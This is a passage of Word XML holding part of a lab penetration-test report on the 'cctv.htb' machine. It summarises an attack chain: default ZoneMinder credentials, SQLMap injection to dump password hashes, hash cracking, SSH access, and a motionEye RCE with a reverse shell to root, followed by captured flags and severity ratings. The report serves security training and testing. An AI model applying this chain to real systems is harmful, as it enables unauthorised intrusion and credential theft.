            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AB">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AC">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section presents the complete attack chain from initial access to full root compromise:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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AD">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🔍  STEP 1 — Scanning &amp; Discovery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100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AE">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap scan → Ports 22 (SSH) and 80 (HTTP) found → Added cctv.htb to hosts → Visited website → Found SecureVision → Clicked Staff Login → ZoneMinder v1.37.63 login page discovered.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1AF">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🔑  STEP 2 — Default Credentials (Finding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B0">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Entered admin:admin on the ZoneMinder login page → Immediately granted full admin dashboard access. Severity: HIGH.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B1">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">💉  STEP 3 — SQL Injection (Finding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B2">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Obtained ZMSESSID cookie → Ran SQLMap against tid= parameter → Extracted zm.Users table → Got bcrypt hashes for all 3 accounts. Severity: CRITICAL.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1B3">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🔓  STEP 4 — Password Cracking (Finding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B4">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">John the Ripper + rockyou.txt → mark's hash cracked → Password: opensesame → SSH login as mark → USER FLAG CAPTURED. CVSS 7.2 High.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1B5">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🚀  STEP 5 — Root via motionEye RCE (Finding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8e6e6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">motionEye found on port 7999 running as root → Credentials in config file → SSH port forward → CVE-2025-60787 exploit → Reverse shell to localhost:9999 → ROOT SHELL OBTAINED → ROOT FLAG CAPTURED. Severity: CRITICAL.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B7">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B8">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Flags Captured — Proof of Full Compromise</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B9">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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20"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2000"/>
            <w:gridCol w:w="7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1BA">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">USER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BB">
            <w:pPr>
              <w:spacing w:after="20" w:before="40" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="666666"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/home/sa_mark/user.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">
            <w:pPr>
              <w:spacing w:after="40" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0d6e6e"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">003488f02441d3fb0b4c7a7aa3ddacdc</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BD">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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20"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2000"/>
            <w:gridCol w:w="7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BE">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ROOT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center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BF">
            <w:pPr>
              <w:spacing w:after="20" w:before="40" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="666666"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/root/root.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C0">
            <w:pPr>
              <w:spacing w:after="40" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">207c878c2b801577ca2d89f4dfc2cb3f</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4752975" cy="436245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752975"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20: User flag — 003488f02441d3fb0b4c7a7aa3ddacdc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C4">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="2505075"/>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0292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00" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 21: Root flag — 207c878c2b801577ca2d89f4dfc2cb3f</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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6e6e" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C7">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7.  RISK RATING &amp; IMPACT</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C9">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7.1  Overall Security Posture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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CA">
            <w:pPr>
              <w:spacing w:after="90" w:before="90" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL — All four vulnerabilities were easily exploitable using public tools. Full root access achieved.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CC">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7.2  Severity Ratings Summary</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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1000"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2320"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3200"/>
            <w:gridCol w:w="1600"/>
            <w:gridCol w:w="1000"/>
            <w:gridCol w:w="1600"/>
            <w:gridCol w:w="2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CD">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CE">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CF">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Severity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D0">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1D1">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary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2">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection (CVE-2024-51482)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3">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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4">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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5">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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6">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Full DB dump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7">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RCE in motionEye (CVE-2025-60787)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8">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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9">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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A">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Root shell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DC">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
